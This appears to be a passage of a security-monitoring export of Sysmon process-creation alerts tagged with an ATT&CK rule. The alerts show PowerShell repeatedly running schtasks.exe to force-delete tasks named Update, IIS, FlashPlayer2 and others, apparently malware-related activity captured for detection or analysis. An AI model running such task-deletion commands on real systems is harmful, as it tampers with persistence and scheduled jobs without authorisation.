{df9fc3d3-b3b5-5ecf-0000-00104d0f2700}\r\nProcessId: 7296\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.456"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00104d0f2700}"",""processId"":""7296"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.431",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.426 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010be0d2700} +ProcessId: 7088 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.432551600Z"",""eventRecordID"":""3059"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.426\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010be0d2700}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.426"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010be0d2700}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.415",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.384 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b092700} +ProcessId: 4692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.387679300Z"",""eventRecordID"":""3058"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.384\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b092700}\r\nProcessId: 4692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.384"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00107b092700}"",""processId"":""4692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.334 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00105f032700} +ProcessId: 3780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.337607500Z"",""eventRecordID"":""3057"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.334\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00105f032700}\r\nProcessId: 3780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.334"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00105f032700}"",""processId"":""3780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.385",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.286 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010aefd2600} +ProcessId: 6948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.289246700Z"",""eventRecordID"":""3056"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.286\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010aefd2600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.286"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010aefd2600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.252 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ebfb2600} +ProcessId: 4912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.256462400Z"",""eventRecordID"":""3055"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.252\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ebfb2600}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.252"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ebfb2600}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.339",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.082 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001009fa2600} +ProcessId: 2128 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.102288700Z"",""eventRecordID"":""3054"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.082\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001009fa2600}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 